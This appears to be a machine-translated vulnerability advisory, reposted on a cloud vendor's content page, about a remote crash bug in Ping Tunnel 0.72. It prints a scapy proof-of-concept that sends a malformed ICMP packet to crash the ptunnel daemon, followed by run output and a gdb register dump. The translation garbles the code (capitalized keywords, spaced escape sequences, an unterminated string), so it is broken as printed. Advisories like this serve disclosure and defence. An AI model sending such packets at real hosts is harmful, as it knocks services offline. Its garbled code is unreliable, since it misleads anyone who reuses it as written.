Ping Tunnel (ptunnel) ICMP packet processing DoS Vulnerability

Source: Internet
Author: User

Release date:
Updated on:

Affected Systems:
Freecode Ping Tunnel 0.72
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54627

Ping Tunnel is a reliable TCP Connection Tool for Tunnel effect. It connects to a remote host through ICMP echo requests and response packets, commonly known as ping requests and replies.

A remote denial of service vulnerability exists in ptunnel 0.72 and other versions. Attackers can exploit this vulnerability to cause the affected applications to crash.

<* Source: st3n
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

St3n () provides the following test methods:


#===================================================== ==========================================================
# PoC code (scapy)
#===================================================== ==========================================================

From scapy. all import *
Conf. verbose = 0

# Arg?
If len (sys. argv) <1:
Sys. exit ('usage: % s

# Target
Remote_host = sys. argv [1]

# Ptunnel. h
# Typedef struct {
# Uint32_t magic, // magic number, used to identify ptunnel packets.
# Dst_ip, // destination IP and port (used by proxy to figure
# Dst_port, // out where to tunnel)
# State, // current connection state; see constants above.
# Ack, // sequence number of last packet encoded ed from other end
# Data_len; // length of data buffer
# Uint16_t seq_no, // sequence number of this packet
# Id_no; // id number, used to separate different tunnels from each other
# Char data [0]; // optional data buffer
#}_ _ Attribute _ (packed) ping_tunnel_pkt_t;

# Build packet
Magic = '\ xd5 \ x20 \ x08 \ 8080'
Dst_ip = 'aaa'
Dst_port = 'bbbbbb'
State = 'cccccc' # <=== this trigger the vulnerability
Ack = '\ x00 \ x00 \ xff'
Data_len = '\ x00 \ x00 \ x00 \ x00'
Seq_id = 'dddd'
Pkt = IP (dst = remote_host)/ICMP ()/Raw (magic)/Raw (dst_ip)/Raw (dst_port)/Raw (state)/Raw (ack) /Raw (data_len)/Raw (seq_id)

# Edevil packet
Send (pkt)


#===================================================== ========================================
# Example & Info
#===================================================== ========================================

# Sending edevil packet
#-------------------

# $ Sudo./ptunnel-dos.py 127.0.0.1
#.
# Sent 1 packets.

 

# Daemon side
#-----------

# $ Ptunnel-c lo
# [Inf]: Starting ptunnel v0.72.
# [Inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
# [Inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
# [Inf]: Forwarding incoming ping packets over TCP.
# [Inf]: Initializing pcap.
# [Inf]: Ping proxy is listening in privileged mode.
# Segmentation fault


# Debug info
#-----------

# Program received signal SIGSEGV, Segmentation fault.
# Handle_packet (buf = 0x80774a0 "E", bytes = 56, is_pcap = 1, addr = 0xbff65c, icmp_sock = 7) at ptunnel. c: 957
#957 pt_log (kLog_sendrecv, "Recv: % d [% d] bytes [seq = % d] [type = % s] [ack = % d] [icmp = % d] [user = % s] [pcap = % d] \ n ",
# (Gdb)
# (Gdb) I r
# Eax 0x3434343 54739779
# Ecx 0x0 0
# Edx 0x3434343 54739779
# Ebx 0x8050184 134545796
# Esp 0xbffff380 0xbffff380
# Ebp 0xbffff468 0xbff468
# Esi 0 xffff 65535
# Edi 0xbffff5c8-1073744440
# Eip 0x804cdfa 0x804cdfa # Eflags 0x10202 [if rf]
# Cs 0x73 115
# Ss 0x7b 123
# Ds 0x7b 123
# Es 0x7b 123
# Fs 0x0 0
# Gs 0x33 51


# Eof

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Freecode
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://freecode.com/projects/

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.